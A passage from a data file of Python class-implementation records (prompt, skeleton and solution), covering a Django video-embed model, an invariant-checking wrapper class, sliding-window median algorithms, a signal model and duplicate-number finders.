super().save(force_insert, force_update, using, update_fields)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Video", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Video:\n\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n <|body_0|>\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n<|end_body_0|>\n\n<|body_start_1|>\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000341", "length_bytes": 1528, "license_type": "permissive", "methods": [{"docstring": "Get correct embed url for Youtube or Vimeo.", "name": "get_embed_url", "signature": "def get_embed_url(self)"}, {"docstring": "Set html field with correct iframe.", "name": "save", "signature": "def save(self, force_insert=False, force_update=False, using=None, update_fields=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007277", "prompt": "Implement the Python class `Video` described below.\n\nClass description:\nImplement the Video class.\n\nMethod signatures and docstrings:\n- def get_embed_url(self): Get correct embed url for Youtube or Vimeo.\n- def save(self, force_insert=False, force_update=False, using=None, update_fields=None): Set html field with correct iframe.", "prompted_full_text": "Implement the Python class `Video` described below.\n\nClass description:\nImplement the Video 
class.\n\nMethod signatures and docstrings:\n- def get_embed_url(self): Get correct embed url for Youtube or Vimeo.\n- def save(self, force_insert=False, force_update=False, using=None, update_fields=None): Set html field with correct iframe.\n\n<|skeleton|>\nclass Video:\n\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n <|body_0|>\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n<|end_body_0|>\n\n<|body_start_1|>\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n<|end_body_1|>\n", "revision_id": "b9b0a3d8b49d5d9b840656f84564ba0a6e016f98", "skeleton": "<|skeleton|>\nclass Video:\n\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n <|body_0|>\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Video:\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n", "source": "the_stack_v2_python_sparse", "source_path": "glitter/blocks/video/models.py", "source_repo": "developersociety/django-glitter", "split": "test", "star_events_count": 3} {"blob_id": "eedf072f38a5bd0cf24c5bde2febdee1785981fa", "bodies": ["self._disable_patching = True\nself._validate_base(self)\nself._disable_patching = False", "self._validate()\nresult = method(*args, **kwargs)\nself._validate()\nreturn result", "attr = super().__getattribute__(name)\nif name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\nif self._disable_patching:\n return attr\nif not isinstance(attr, MethodType):\n return attr\npatched_method = partial(self._patched_method, attr)\nreturn update_wrapper(patched_method, attr)", "super().__setattr__(name, value)\nif name == '_disable_patching':\n return\nself._validate()"], "bodies_text": "<|body_start_0|>\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n<|end_body_0|>\n\n<|body_start_1|>\n self._validate()\n result = 
method(*args, **kwargs)\n self._validate()\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n<|end_body_2|>\n\n<|body_start_3|>\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n<|end_body_3|>\n", "class_docstring": "", "class_name": "InvariantedClass", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InvariantedClass:\n\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n <|body_0|>\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n <|body_1|>\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n <|body_2|>\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n<|end_body_0|>\n\n<|body_start_1|>\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n<|end_body_2|>\n\n<|body_start_3|>\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000342", "length_bytes": 3490, "license_type": "permissive", "methods": [{"docstring": "Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.", "name": "_validate", "signature": "def _validate(self) -> None"}, {"docstring": "Step 4 (1st flow). Call method", "name": "_patched_method", "signature": "def _patched_method(self, method: Callable, *args, **kwargs)"}, {"docstring": "Step 3 (1st flow). Get method", "name": "__getattribute__", "signature": "def __getattribute__(self, name: str)"}, {"docstring": "Step 3 (2nd flow). Set some attribute", "name": "__setattr__", "signature": "def __setattr__(self, name: str, value)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003891", "prompt": "Implement the Python class `InvariantedClass` described below.\n\nClass description:\nImplement the InvariantedClass class.\n\nMethod signatures and docstrings:\n- def _validate(self) -> None: Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\n- def _patched_method(self, method: Callable, *args, **kwargs): Step 4 (1st flow). Call method\n- def __getattribute__(self, name: str): Step 3 (1st flow). Get method\n- def __setattr__(self, name: str, value): Step 3 (2nd flow). 
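The `Video` record above extracts a video id with YOUTUBE_URL_RE / VIMEO_URL_RE, neither of which survives in the record, and its save() formats an empty `iframe_html` string — the iframe template was evidently stripped somewhere in extraction. Below is a minimal runnable sketch of the same lookup; the two regexes are assumptions, chosen only so that group(2) is the YouTube id and group(3) the Vimeo id, matching the group numbers the class uses.

import re

# Assumed patterns (not from the record): group(2) must capture the
# YouTube id and group(3) the Vimeo id to match get_embed_url above.
YOUTUBE_URL_RE = re.compile(
    r'(https?://)?(?:www\.)?(?:youtube\.com/watch\?v=|youtu\.be/)([\w-]{11})')
VIMEO_URL_RE = re.compile(r'(https?://)?(www\.)?vimeo\.com/(\d+)')

def get_embed_url(url):
    """Return the embeddable player URL for a YouTube or Vimeo link, else None."""
    yt = re.match(YOUTUBE_URL_RE, url)
    if yt:
        return 'https://www.youtube.com/embed/{}'.format(yt.group(2))
    vm = re.match(VIMEO_URL_RE, url)
    if vm:
        return 'https://player.vimeo.com/video/{}'.format(vm.group(3))
    return None

assert get_embed_url('https://www.youtube.com/watch?v=dQw4w9WgXcQ') == \
    'https://www.youtube.com/embed/dQw4w9WgXcQ'
assert get_embed_url('https://vimeo.com/148751763') == \
    'https://player.vimeo.com/video/148751763'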
Set some attribute", "prompted_full_text": "Implement the Python class `InvariantedClass` described below.\n\nClass description:\nImplement the InvariantedClass class.\n\nMethod signatures and docstrings:\n- def _validate(self) -> None: Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\n- def _patched_method(self, method: Callable, *args, **kwargs): Step 4 (1st flow). Call method\n- def __getattribute__(self, name: str): Step 3 (1st flow). Get method\n- def __setattr__(self, name: str, value): Step 3 (2nd flow). Set some attribute\n\n<|skeleton|>\nclass InvariantedClass:\n\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n <|body_0|>\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n <|body_1|>\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n <|body_2|>\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n<|end_body_0|>\n\n<|body_start_1|>\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n<|end_body_2|>\n\n<|body_start_3|>\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n<|end_body_3|>\n", "revision_id": "9dff86e1dc5c8607f02ded34b6d64e770f1959fa", "skeleton": "<|skeleton|>\nclass InvariantedClass:\n\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n <|body_0|>\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n <|body_1|>\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n <|body_2|>\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InvariantedClass:\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). 
Set some attribute\"\"\"\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n", "source": "the_stack_v2_python_sparse", "source_path": "deal/_decorators/inv.py", "source_repo": "toonarmycaptain/deal", "split": "test", "star_events_count": 0} {"blob_id": "5cbab5ca770c8631b498657df7fe93be80e8b008", "bodies": ["if len(nums) < 1:\n return []\nret = []\ndh = DualHeap()\nfor i in xrange(k):\n dh.add(nums[i])\nret.append(dh.median())\nfor i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\nreturn ret", "if len(nums) < 1:\n return []\npq = PriorityQueue()\nfor i in xrange(k):\n pq.insert(nums[i])\nret = []\nmid = k / 2\nif k % 2 == 0:\n mid -= 1\nret.append(pq[mid])\nfor i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\nreturn ret"], "bodies_text": "<|body_start_0|>\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n <|body_0|>\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000343", "length_bytes": 4918, "license_type": "permissive", "methods": [{"docstring": "Use heap", "name": "medianSlidingWindow", "signature": "def medianSlidingWindow(self, nums, k)"}, {"docstring": "Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.", "name": "medianSlidingWindow_TLE", "signature": "def medianSlidingWindow_TLE(self, nums, k)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005968", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def medianSlidingWindow(self, nums, k): Use heap\n- def medianSlidingWindow_TLE(self, nums, k): Use priority queue :param nums: A list of integers. 
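`InvariantedClass` (from deal's inv.py) reroutes every bound-method lookup through `__getattribute__` so an invariant runs before and after each call, and re-checks after every attribute write. Two details are easy to miss: `_validate_base` is supplied externally by deal's decorator machinery (not shown in the record), and the record's `_validate` restores `_disable_patching` only on success, so one failed check silently disables all later checks. The self-contained sketch below reproduces the same mechanics with a stub invariant; the class-level `_disable_patching` default and the try/finally are my additions, not deal's.

from functools import partial, update_wrapper
from types import MethodType

class Invarianted:
    _disable_patching = False  # class-level default so lookups work before __init__ runs

    def _validate(self):
        self._disable_patching = True
        try:
            self._validate_base()   # supplied by the concrete class below
        finally:
            self._disable_patching = False

    def _patched_method(self, method, *args, **kwargs):
        self._validate()
        result = method(*args, **kwargs)
        self._validate()
        return result

    def __getattribute__(self, name):
        attr = super().__getattribute__(name)
        if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):
            return attr             # never wrap the machinery itself
        if self._disable_patching or not isinstance(attr, MethodType):
            return attr
        return update_wrapper(partial(self._patched_method, attr), attr)

    def __setattr__(self, name, value):
        super().__setattr__(name, value)
        if name != '_disable_patching':
            self._validate()        # re-check after every ordinary write

class Account(Invarianted):
    def __init__(self, balance):
        self.balance = balance

    def _validate_base(self):
        assert self.balance >= 0, 'negative balance'

    def withdraw(self, amount):
        self.balance -= amount

acc = Account(10)
acc.withdraw(4)                     # checked before and after: fine
try:
    acc.withdraw(100)               # the write inside trips the invariant
except AssertionError as exc:
    print('caught:', exc)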
:param k: size of window :return: The median of element inside the window at each moving.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def medianSlidingWindow(self, nums, k): Use heap\n- def medianSlidingWindow_TLE(self, nums, k): Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\n\n<|skeleton|>\nclass Solution:\n\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n <|body_0|>\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n<|end_body_1|>\n", "revision_id": "4629a3857b2c57418b86a3b3a7180ecb15e763e3", "skeleton": "<|skeleton|>\nclass Solution:\n\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n <|body_0|>\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. 
:param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n", "source": "the_stack_v2_python_sparse", "source_path": "archive/Sliding Window Median TLE.py", "source_repo": "RijuDasgupta9116/LintCode", "split": "test", "star_events_count": 0} {"blob_id": "d79ca176120b15bade280614c6e7c4ad53b962f7", "bodies": ["self.leader = leader\nself.movement = movement\nself.time_stamp = datetime.now()\nself.message = message", "signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\nif self.message:\n signal_dict['message'] = self.message\nreturn signal_dict"], "bodies_text": "<|body_start_0|>\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n<|end_body_0|>\n\n<|body_start_1|>\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n<|end_body_1|>\n", "class_docstring": "Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.", "class_name": "Signal", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n<|end_body_0|>\n\n<|body_start_1|>\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000344", "length_bytes": 1347, "license_type": "no_license", "methods": [{"docstring": "Construct a new signal.", "name": "__init__", "signature": "def __init__(self, leader, movement, message=None)"}, {"docstring": "Get the json representation of the signal.", "name": "to_json", "signature": "def to_json(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006731", "prompt": "Implement the Python class `Signal` described below.\n\nClass description:\nRepresentation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\n\nMethod signatures and docstrings:\n- def __init__(self, leader, movement, message=None): Construct a new signal.\n- def to_json(self): Get the json representation of the signal.", "prompted_full_text": "Implement the Python class `Signal` described below.\n\nClass description:\nRepresentation of signals in the database. :attribute leader: The leader that created this signal. 
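The sliding-window-median record above leans on a `DualHeap` that the record never defines, and its code is Python 2 (`xrange`, integer `k / 2`). A plausible Python 3 reconstruction — an assumption, not the repository's code — is the standard pair of heaps with lazy deletion: a max-heap for the lower half, a min-heap for the upper half, and a delayed-removal counter so remove() stays O(log k) amortized.

import heapq
from collections import defaultdict

class DualHeap:
    """Lower half in a max-heap (negated values), upper half in a min-heap.
    Removals are deferred until the doomed value surfaces at a heap top."""

    def __init__(self):
        self.small = []                  # max-heap via negation: lower half
        self.large = []                  # min-heap: upper half
        self.delayed = defaultdict(int)  # value -> pending removals
        self.small_size = 0              # live element counts only
        self.large_size = 0

    def _prune(self, heap):
        sign = -1 if heap is self.small else 1
        while heap and self.delayed[sign * heap[0]]:
            self.delayed[sign * heap[0]] -= 1
            heapq.heappop(heap)

    def _rebalance(self):
        # Invariant: small holds as many live items as large, or one more.
        if self.small_size > self.large_size + 1:
            heapq.heappush(self.large, -heapq.heappop(self.small))
            self.small_size -= 1
            self.large_size += 1
            self._prune(self.small)      # the new small top may be stale
        elif self.small_size < self.large_size:
            heapq.heappush(self.small, -heapq.heappop(self.large))
            self.small_size += 1
            self.large_size -= 1
            self._prune(self.large)

    def add(self, num):
        if not self.small or num <= -self.small[0]:
            heapq.heappush(self.small, -num)
            self.small_size += 1
        else:
            heapq.heappush(self.large, num)
            self.large_size += 1
        self._rebalance()

    def remove(self, num):
        self.delayed[num] += 1
        if self.small and num <= -self.small[0]:
            self.small_size -= 1
            if num == -self.small[0]:
                self._prune(self.small)
        else:
            self.large_size -= 1
            if self.large and num == self.large[0]:
                self._prune(self.large)
        self._rebalance()

    def median(self):
        if self.small_size > self.large_size:
            return -self.small[0]
        return (-self.small[0] + self.large[0]) / 2

nums, k = [1, 3, -1, -3, 5, 3, 6, 7], 3
dh, out = DualHeap(), []
for i, num in enumerate(nums):
    dh.add(num)
    if i >= k:
        dh.remove(nums[i - k])
    if i >= k - 1:
        out.append(dh.median())
print(out)   # [1, -1, -1, 3, 5, 6]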
:attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\n\nMethod signatures and docstrings:\n- def __init__(self, leader, movement, message=None): Construct a new signal.\n- def to_json(self): Get the json representation of the signal.\n\n<|skeleton|>\nclass Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n<|end_body_0|>\n\n<|body_start_1|>\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n<|end_body_1|>\n", "revision_id": "970f5555b398a42fcb47782f2edbbbba413f3c3e", "skeleton": "<|skeleton|>\nclass Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. 
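One subtlety in the `Signal` record: `datetime.now()` produces a naive timestamp, and to_json then relies on the Python 3.6+ rule that `astimezone()` on a naive datetime assumes local time. A small illustration; storing an aware UTC timestamp up front is the less surprising variant.

from datetime import datetime, timezone

naive = datetime.now()              # what Signal.__init__ stores
aware = naive.astimezone()          # assumes local time (Python 3.6+)
print(str(aware))                   # e.g. '2024-01-15 09:30:00.123456+01:00'

utc = datetime.now(timezone.utc)    # aware from the start
print(str(utc.astimezone()))        # same rendering, no ambiguity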
:attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n", "source": "the_stack_v2_python_sparse", "source_path": "gridt/models/signal.py", "source_repo": "GridtNetwork/gridtlib", "split": "test", "star_events_count": 0} {"blob_id": "423330e2069b955723084dcd464c1bfe545eedf3", "bodies": ["length = len(nums)\nstore = [0] * length\nfor num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\nreturn -1", "find_dict = dict()\nfor num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0", "find_set = set()\nfor num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)"], "bodies_text": "<|body_start_0|>\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n<|end_body_0|>\n\n<|body_start_1|>\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n<|end_body_1|>\n\n<|body_start_2|>\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n <|body_0|>\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n <|body_1|>\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n<|end_body_0|>\n\n<|body_start_1|>\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n<|end_body_1|>\n\n<|body_start_2|>\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000345", "length_bytes": 1945, "license_type": "no_license", "methods": [{"docstring": "第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费", "name": "findRepeatNumber", "signature": "def findRepeatNumber(self, nums: List[int]) -> int"}, {"docstring": "第二种方法 